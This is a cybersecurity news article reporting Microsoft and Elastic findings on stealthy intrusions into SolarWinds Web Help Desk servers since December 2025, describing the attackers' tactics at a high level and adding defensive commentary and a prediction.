Microsoft and Elastic Expose Stealthy SolarWinds Web Help Desk Intrusions Active Since December 2025

Introduction: A Quiet Breach That Didn’t Stay Quiet for Long

A new wave of targeted intrusions has pushed enterprise IT support infrastructure back into the cybersecurity spotlight. Researchers from Microsoft and Elastic have jointly uncovered a series of multi-stage attacks abusing SolarWinds Web Help Desk (WHD) servers, active since December 2025. What makes this campaign especially dangerous is not a flashy zero-day, but how quietly attackers blended into normal administrative activity—using legitimate tools, trusted processes, and remote management features to stay hidden for months.

the Original Report

The investigation reveals that attackers specifically targeted on-premise SolarWinds Web Help Desk servers, a tool widely used by IT teams to manage tickets, assets, and internal support workflows. Once access was gained, the intruders deployed a multi-stage intrusion chain designed to look like routine system maintenance.

Initial access was followed by remote MSI package installations, allowing attackers to deploy additional payloads without triggering obvious alarms. Rather than dropping custom malware immediately, the attackers relied heavily on Remote Monitoring and Management (RMM) tools, a tactic that allowed them to operate under the guise of legitimate IT administration.

Persistence was achieved through credential dumping, but again, without exotic malware. The attackers used well-known, legitimate system utilities already present on Windows systems. This “living-off-the-land” approach reduced their footprint and made detection significantly harder.

Telemetry shared by Microsoft and Elastic suggests the activity began as early as December 2025, meaning some organizations may have been compromised for weeks—or longer—before any indicators surfaced. The campaign showed signs of careful planning, with attackers prioritizing stealth, lateral movement potential, and long-term access over immediate data destruction or ransomware deployment.

Crucially, no single exploit or vulnerability was highlighted as the sole entry point. Instead, the campaign appears to have leveraged exposed or weakly secured WHD servers, combined with poor credential hygiene and overly permissive remote access configurations. This aligns with a growing trend where attackers exploit operational blind spots rather than purely technical flaws.

Both Microsoft and Elastic emphasize that the abuse of legitimate tools, signed installers, and standard admin workflows dramatically complicates detection. Traditional signature-based defenses may see nothing more than “normal IT behavior,” allowing attackers to persist unnoticed inside trusted systems.

What Undercode Say:

This campaign is a textbook example of how modern intrusions no longer need loud exploits to be effective. The attackers didn’t break down the door—they walked in wearing an IT badge.

SolarWinds Web Help Desk sits in a uniquely sensitive position. It often runs with elevated privileges, touches internal networks, and is trusted by default. Compromising it offers attackers a vantage point that is operationally rich but rarely scrutinized as aggressively as domain controllers or email servers.

The real danger here isn’t SolarWinds itself—it’s how enterprises treat internal tools as inherently safe. Once attackers can install MSI packages remotely and invoke RMM utilities, they effectively inherit the same powers as an internal administrator. From there, credential dumping becomes less of an “attack” and more of a routine administrative action gone unnoticed.

What stands out is the discipline of the intrusion chain. No rush to ransomware. No noisy data exfiltration. Just quiet persistence. This strongly suggests either an espionage-motivated actor or a financially motivated group preparing high-value access for later monetization.

Defenders should also take note: EDR visibility alone is not enough when attackers intentionally mimic normal behavior. Context matters. Why is an RMM tool being deployed at 3 a.m.? Why is a help desk server installing MSI packages unrelated to ticketing functions? These are behavioral questions, not signature problems.

From a strategic perspective, this incident reinforces a hard truth: internal infrastructure must be threat-modeled like external-facing assets. Help desk platforms, backup servers, monitoring dashboards—these are now prime targets because they are trusted, powerful, and often overlooked.

Organizations that still assume “if it’s internal, it’s safe” are already behind.

Fact Checker Results

Microsoft and Elastic did publicly report multi-stage intrusions linked to SolarWinds Web Help Desk activity.

The attack relied heavily on legitimate tools, MSI installers, and RMM abuse rather than custom malware.

No evidence currently confirms large-scale ransomware deployment directly tied to this campaign.

Prediction

Expect a surge in targeted attacks against IT management and support platforms throughout 2026. As detection improves around endpoints and email, attackers will increasingly weaponize trusted internal systems—turning everyday administrative tools into long-term access gateways rather than one-time breach points.